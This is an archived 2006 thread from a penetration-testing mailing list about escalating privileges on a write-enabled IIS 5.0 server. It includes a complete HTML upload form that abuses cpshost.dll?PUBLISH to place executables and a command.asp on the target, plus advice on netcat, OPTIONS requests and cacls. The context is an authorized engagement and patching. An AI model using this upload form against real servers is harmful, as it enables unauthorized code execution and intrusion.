Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: privelege escalation with .bat files
From: "Ben Greenberg" <bengreenb () hotmail com>
Date: Wed, 26 Apr 2006 07:51:30 +0000

What I did is I read up on the documentation, and figured out how to make the following html form which I could upload executables to cpshost.dll(and eventually upload a command.asp):

<html>
<body>
<h2 align="center">cpshost.dll upload form</h2>
<hr>
<form enctype="multipart/form-data" action="TARGETHOST.COM/scripts/cpshost.dll?PUBLISH" method="POST">
 <center><table border="1">
   <tr>
     <th align="center" colspan="2">Using Visible Form Field</th>
   </tr>
   <tr>
     <th align="left">File to upload</th>
     <td align="left"><input name="file" type="file" size="30"></td>
   </tr>
   <tr>
     <th align="left">Destination URL</th>
<td align="left"><input type="text" name="TargetURL" value="/scripts/" size="30">
     <input type="Submit" value="Upload..."></td>
   </tr>
 </table></center>
</form>
</body>
</html>

I hope this helps you guys as much as you helped me. The client is very happy and I now have the job of patching this vulnerability(shouldn't be nearly as difficult as finding it).

P.S. I mispelled cpshost.dll in my previous post(s).  Forgot the "s"

--ben


From: tony.dimichele () americas bnpparibas com
To: bengreenb () hotmail com
Subject: Re: privelege escalation with .bat files
Date: Tue, 25 Apr 2006 15:50:38 -0400

Good find.  Any chance you could shoot me the POST you crafted?




Internet
bengreenb () hotmail com
04/25/2006 03:41 PM

To
Tony DIMICHELE
cc

Subject
Re: privelege escalation with .bat files







It turns out that I was able to use cphost.dll to get command access.
We're
gonna secure the server.  If it weren't for cphost.dll, I don't think I
had
enough OPTIONS to execute the .bat.

>From: tony.dimichele () americas bnpparibas com
>To: bengreenb () hotmail com
>Subject: Re: privelege escalation with .bat files
>Date: Tue, 25 Apr 2006 11:09:11 -0400
>
>I'm not sure that the POSTis going to help you.  The IIS server should
>handle requests based upon the extension associated with the requested
>file.  Can you upload and execute .cgi, .pl, or any other 'possibly'
>executable files?
>
>Are you using netcat?  Have you performed a performed an OPTIONS request
>to see what other requests are at your disposal?
>
>OPTIONS * HTTP/1.0
>
>
>
>
>
>
>Internet
>bengreenb () hotmail com
>04/25/2006 10:41 AM
>
>To
>Tony DIMICHELE
>cc
>
>Subject
>Re: privelege escalation with .bat files
>
>
>
>
>
>
>
>I'm trying to figure out if I can execute.  If I make a get request, my
>browser tries to download.  I was thinking perhaps a POST request could
>have
>the script treat it as a cgi, the same way it does .exe's.
>
>--ben
>
> >From: tony.dimichele () americas bnpparibas com
> >To: bengreenb () hotmail com
> >Subject: Re: privelege escalation with .bat files
> >Date: Tue, 25 Apr 2006 10:09:32 -0400
> >
> >Take a look at CALCS.exe  - http://www.computerhope.com/cacls.htm
> >Can you execute the batch file after uploading or do you need to
escalate
> >priveleges before you can execute your batch file?
> >
> >
> >
> >
> >Extranet
> >bengreenb () hotmail com
> >04/24/2006 12:25 PM
> >
> >To
> >pen-test
> >cc
> >
> >Subject
> >privelege escalation with .bat files
> >
> >
> >
> >
> >
> >
> >Hi.  I'm pen-testing an IIS 5.0 server that is insecurely set up to
allow
> >write-access to it as a web folder.  However, its also set up to deny
> >copying (or renaming to) of the following file extensions .asp, .com,
> >.cmd,
> >.exe, and .dll. Interestingly, it does allow .bat files to be written
>onto
> >the server.  Is there a way to escalate privelleges (and possibly get a
> >command prompt) through a .bat file?  Thank you,
> >
> >--ben
> >
> >
> >
>
>------------------------------------------------------------------------------
> >This List Sponsored by: Cenzic
> >
> >Concerned about Web Application Security?
> >Why not go with the #1 solution - Cenzic, the only one to win the
> >Analyst's
> >Choice Award from eWeek. As attacks through web applications continue
to
> >rise,
> >you need to proactively protect your applications from hackers. Cenzic
>has
> >the
> >most comprehensive solutions to meet your application security
>penetration
> >testing and vulnerability management needs. You have an option to go
with
> >a
> >managed service (Cenzic ClickToSecure) or an enterprise software
> >(Cenzic Hailstorm). Download FREE whitepaper on how a managed service
can
> >help you: http://www.cenzic.com/news_events/wpappsec.php
> >And, now for a limited time we can do a FREE audit for you to confirm
>your
> >results from other product. Contact us at request () cenzic com for
details.
>
>------------------------------------------------------------------------------
> >
> >
> >This message and any attachments (the "message") is
> >intended solely for the addressees and is confidential.
> >If you receive this message in error, please delete it and
> >immediately notify the sender. Any use not in accord with
> >its purpose, any dissemination or disclosure, either whole
> >or partial, is prohibited except formal approval. The internet
> >can not guarantee the integrity of this message.
> >BNP PARIBAS (and its subsidiaries) shall (will) not
> >therefore be liable for the message if modified.
> >
> >                 ---------------------------------------------
> >
> >Ce message et toutes les pieces jointes (ci-apres le
> >"message") sont etablis a l'intention exclusive de ses
> >destinataires et sont confidentiels. Si vous recevez ce
> >message par erreur, merci de le detruire et d'en avertir
> >immediatement l'expediteur. Toute utilisation de ce
> >message non conforme a sa destination, toute diffusion
> >ou toute publication, totale ou partielle, est interdite, sauf
> >autorisation expresse. L'internet ne permettant pas
> >d'assurer l'integrite de ce message, BNP PARIBAS (et ses
> >filiales) decline(nt) toute responsabilite au titre de ce
> >message, dans l'hypothese ou il aurait ete modifie.
> >
>
>
>
>This message and any attachments (the "message") is
>intended solely for the addressees and is confidential.
>If you receive this message in error, please delete it and
>immediately notify the sender. Any use not in accord with
>its purpose, any dissemination or disclosure, either whole
>or partial, is prohibited except formal approval. The internet
>can not guarantee the integrity of this message.
>BNP PARIBAS (and its subsidiaries) shall (will) not
>therefore be liable for the message if modified.
>
>                 ---------------------------------------------
>
>Ce message et toutes les pieces jointes (ci-apres le
>"message") sont etablis a l'intention exclusive de ses
>destinataires et sont confidentiels. Si vous recevez ce
>message par erreur, merci de le detruire et d'en avertir
>immediatement l'expediteur. Toute utilisation de ce
>message non conforme a sa destination, toute diffusion
>ou toute publication, totale ou partielle, est interdite, sauf
>autorisation expresse. L'internet ne permettant pas
>d'assurer l'integrite de ce message, BNP PARIBAS (et ses
>filiales) decline(nt) toute responsabilite au titre de ce
>message, dans l'hypothese ou il aurait ete modifie.
>



This message and any attachments (the "message") is
intended solely for the addressees and is confidential.
If you receive this message in error, please delete it and
immediately notify the sender. Any use not in accord with
its purpose, any dissemination or disclosure, either whole
or partial, is prohibited except formal approval. The internet
can not guarantee the integrity of this message.
BNP PARIBAS (and its subsidiaries) shall (will) not
therefore be liable for the message if modified.

                ---------------------------------------------

Ce message et toutes les pieces jointes (ci-apres le
"message") sont etablis a l'intention exclusive de ses
destinataires et sont confidentiels. Si vous recevez ce
message par erreur, merci de le detruire et d'en avertir
immediatement l'expediteur. Toute utilisation de ce
message non conforme a sa destination, toute diffusion
ou toute publication, totale ou partielle, est interdite, sauf
autorisation expresse. L'internet ne permettant pas
d'assurer l'integrite de ce message, BNP PARIBAS (et ses
filiales) decline(nt) toute responsabilite au titre de ce
message, dans l'hypothese ou il aurait ete modifie.




------------------------------------------------------------------------------
This List Sponsored by: Cenzic

Concerned about Web Application Security? Why not go with the #1 solution - Cenzic, the only one to win the Analyst's Choice Award from eWeek. As attacks through web applications continue to rise, you need to proactively protect your applications from hackers. Cenzic has the most comprehensive solutions to meet your application security penetration testing and vulnerability management needs. You have an option to go with a managed service (Cenzic ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download FREE whitepaper on how a managed service can help you: http://www.cenzic.com/news_events/wpappsec.php And, now for a limited time we can do a FREE audit for you to confirm your results from other product. Contact us at request () cenzic com for details.
------------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault